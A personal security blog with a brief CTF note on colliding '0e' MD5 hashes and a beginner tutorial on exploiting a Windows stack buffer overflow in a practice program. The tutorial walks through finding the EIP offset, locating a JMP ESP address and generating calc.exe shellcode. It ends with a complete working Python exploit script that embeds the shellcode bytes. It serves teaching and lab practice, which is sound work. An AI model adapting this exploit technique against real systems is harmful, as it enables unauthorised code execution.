Monday, December 15, 2014

My solution - Garage4Hackers Xmas / Dec Web Challenge 2014

I participated and cracked the CTF hosted by G4H, the complete write up is available on the below link.

I also found another way to solve the CTF (a bug actually), MD5 hash was used and due to collision there were two hashes for the same plaintext.

0e104142395260374396839196939683 (This works!)

0e100132199235687421930375421091 (Found in HTML source code, if you use this it says: umm!! nice try dude :), oops! )

The above link has the source code, the challenge and the solutions submitted. It was a tricky one!

Thursday, June 19, 2014

Exploiting buffer overflow in Windows - A noob's guide

Run the binaryfile in CLI and connect to the 8987 port using ncat or telnet.

Enter any string and press enter.

Now, repeat the above steps and give a large value until the program crashes as shown below. 

 Let’s use a debugger to better understand this behavior.

Setting up the debugger:

Install Windbg for windows. After installing windbg, set windbg as the postmortem debugger using the command below:

Now, it looks like the input was read into the buffer and caused the buffer to overflow.  We have been able to overflow the buffer and write across the instruction pointer.   So we may be able to control the value of EIP. To find the how big the buffer needs to be in order to start overwriting EIP we need to determine the offset. This offset is the no. of bytes that must be filled before we can write our desired value to EIP.

Determining the buffer length:

Using metasploit’s tool we can calculate the required offset. The tool generates string that will contain unique patterns and using this pattern we can determine how big the buffer is and thus the offset value.
Generate a pattern of length 100 and enter this as the input.

The program crashes, debug the program and copy the value in EIP. Calculate the exact length of the buffer using the metasploit script as shown below:

The buffer length needed to overwrite EIP is 62. So this means to overwrite EIP I would need to have 62 junk (A*62) or NOP sleds. After which I can give the memory location of the instruction I want to execute. This is how my input should look like, the below arrow points the position from where EIP overwrite begins.

The below table shows the current value in the EBP, EIP and ESP. EIP contains BBBB which is
exactly after 62*junk values.
Memory Offset
Current value

We now know that we control EIP which means that we would need a space to put our shellcode somewhere and make EIP jump to that location.
Now take a look at the registers and dump all of them using the command: dump <registername>
In this case, ESP seems to point to C’s (43) which is from our input.  We can see that ESP starts immediately after the value in EIP (B’s).

Jumping to ESP:

There are two ways to execute the shellcode in ESP, one method is to simply overwrite EIP with the value of ESP memory location i.e. 0x0012FDB0 (little endian) or a reliable way is to find an instruction that would jump to ESP i.e. JMP ESP
The below command will search for the opcode JMP ESP i.e. ff e4

Now, I could use one of these as my value to replace EIP. When the instruction in 0x77384281 executes it will jump to ESP to execute my desired code.

Generating the shellcode:

The objective is to run calc.exe using the shellcode. Using msfpayload with windows as the target and calc.exe as the program I generated a shellcode. The below screenshot shows the msfpayload options.

Exploit code and execution:

I wrote a python script that would open a TCP connection and send my data. The variable buf has the shellcode that we generated above.

#!/usr/bin/env python

import socket
import sys
import struct
TCP_IP = ''
TCP_PORT = 8987
BUFFER_SIZE = 1048756

junk = "\x90" * 62
esp = struct.pack('<I', 0x77384281)            #Little endian format
nops = "\x90" * 5

buf =  ""
#buf +=  "\xcc"                          #Breakpoint
buf += "\xba\x92\xaf\x02\xf3\xdb\xd3\xd9\x74\x24\xf4\x5e\x29"
buf += "\xc9\xb1\x33\x31\x56\x12\x83\xc6\x04\x03\xc4\xa1\xe0"
buf += "\x06\x14\x55\x6d\xe8\xe4\xa6\x0e\x60\x01\x97\x1c\x16"
buf += "\x42\x8a\x90\x5c\x06\x27\x5a\x30\xb2\xbc\x2e\x9d\xb5"
buf += "\x75\x84\xfb\xf8\x86\x28\xc4\x56\x44\x2a\xb8\xa4\x99"
buf += "\x8c\x81\x67\xec\xcd\xc6\x95\x1f\x9f\x9f\xd2\xb2\x30"
buf += "\xab\xa6\x0e\x30\x7b\xad\x2f\x4a\xfe\x71\xdb\xe0\x01"
buf += "\xa1\x74\x7e\x49\x59\xfe\xd8\x6a\x58\xd3\x3a\x56\x13"
buf += "\x58\x88\x2c\xa2\x88\xc0\xcd\x95\xf4\x8f\xf3\x1a\xf9"
buf += "\xce\x34\x9c\xe2\xa4\x4e\xdf\x9f\xbe\x94\xa2\x7b\x4a"
buf += "\x09\x04\x0f\xec\xe9\xb5\xdc\x6b\x79\xb9\xa9\xf8\x25"
buf += "\xdd\x2c\x2c\x5e\xd9\xa5\xd3\xb1\x68\xfd\xf7\x15\x31"
buf += "\xa5\x96\x0c\x9f\x08\xa6\x4f\x47\xf4\x02\x1b\x65\xe1"
buf += "\x35\x46\xe3\xf4\xb4\xfc\x4a\xf6\xc6\xfe\xfc\x9f\xf7"
buf += "\x75\x93\xd8\x07\x5c\xd0\x19\xf9\x6d\xcc\x8e\xa0\x07"
buf += "\xad\xd2\x52\xf2\xf1\xea\xd0\xf7\x89\x08\xc8\x7d\x8c"
buf += "\x55\x4e\x6d\xfc\xc6\x3b\x91\x53\xe6\x69\xf2\x32\x74"
buf += "\xf1\xdb\xd1\xfc\x90\x23"

#MESSAGE += "\x81\x42\x38\x77"                 #deprecated code
#MESSAGE += "\x81\x42\x38\x77"                 #deprecated code

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((TCP_IP, TCP_PORT))
s.send(junk + esp + nops + buf + nops)
data = s.recv(BUFFER_SIZE)

print "received data:", data

Run the python script. The program crashes as expected and calc.exe is running in the background. The exploit code worked successfully!

Points to remember:

  • When assigning the value of ESP to a variable, note that it has to be assigned backwards since the addresses are stored little-endian on intel x86. Another way of achieving this is to use “struct.pack”
  • Use NOP sled before the shellcode, this will give me flexibility without having to pin-point from where my shellcode starts. Nop sleds will give me a bigger target to return to and if any NOP instructions are hit then (No operation) the program runs until all NOPs. After this the instructions in shellcode will be executed
  • Disable DEP in Windows so that the shellcode placed in the stack can be executed.

